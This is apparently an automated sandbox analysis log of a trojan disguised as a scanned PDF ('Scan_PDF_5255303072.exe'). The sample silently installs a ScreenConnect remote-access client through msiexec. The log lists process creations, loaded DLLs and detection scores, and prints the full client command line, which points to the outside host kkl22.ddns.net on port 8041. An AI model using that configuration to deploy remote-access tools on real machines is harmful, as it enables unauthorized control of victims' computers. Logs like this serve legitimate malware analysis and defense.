Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB104311CA 10_2_00007FFB104311CA
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB10414285 10_2_00007FFB10414285
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB1041FBCA 10_2_00007FFB1041FBCA
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB10425435 10_2_00007FFB10425435
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB10430FCA 10_2_00007FFB10430FCA
PE file contains executable resources (Code or Archives)
Source: Scan_PDF_5255303072.exe Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: Scan_PDF_5255303072.exe Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: Scan_PDF_5255303072.exe Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: Scan_PDF_5255303072.exe Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: Scan_PDF_5255303072.exe Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Sample file is different than original file name gathered from version info
Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.00000000008AF000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000000.1359612132.00000000008AF000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1396507381.00000000058F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1396507381.00000000058F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1396507381.00000000058F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1384725267.0000000003240000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1456809649.000000000ADED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsiexec.exe.mu vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1384122334.0000000003090000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1398979904.0000000005DAC000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1398979904.0000000005DAC000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1398979904.0000000005DAC000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1398979904.0000000005DAC000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1402990235.0000000006DE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1402990235.0000000006DE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1402990235.0000000006DE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe, 00000000.00000002.1395763428.0000000005760000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_5255303072.exe
Uses 32bit PE files
Source: Scan_PDF_5255303072.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.Scan_PDF_5255303072.exe.5760000.5.raw.unpack, CursorBuffer.cs Cryptographic APIs: 'TransformBlock'
Source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, WindowsToolkit.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal46.troj.evad.winEXE@18/53@1/1
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa) Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe File created: C:\Users\user\AppData\Local\Temp\ScreenConnect Jump to behavior
Source: Scan_PDF_5255303072.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Scan_PDF_5255303072.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: Scan_PDF_5255303072.exe ReversingLabs: Detection: 18%
Source: Scan_PDF_5255303072.exe Virustotal: Detection: 25%
Source: Scan_PDF_5255303072.exe String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: Scan_PDF_5255303072.exe String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe File read: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Scan_PDF_5255303072.exe "C:\Users\user\Desktop\Scan_PDF_5255303072.exe"
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 08772D93E0B8DF49F1B3D9E4A01C860E C
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AC03A9C172D160F64965C45660113A3A
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2A805C403B12BA315C9F95579D7B0130 E Global\MSI0000
Source: unknown Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=13ce54a3-51cc-45e8-93e2-c37e596084ea&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "fce76b6a-ad53-4862-9f42-38fab4a23da9" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "dd836f41-3f56-4290-8f8a-1dd8ba6c700c" "System"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 08772D93E0B8DF49F1B3D9E4A01C860E C Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AC03A9C172D160F64965C45660113A3A Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2A805C403B12BA315C9F95579D7B0130 E Global\MSI0000 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI6E42.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4878046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "fce76b6a-ad53-4862-9f42-38fab4a23da9" "User" Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "dd836f41-3f56-4290-8f8a-1dd8ba6c700c" "System" Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: virtdisk.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msihnd.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srclient.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: spp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: virtdisk.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: fltlib.dll Jump to behavior
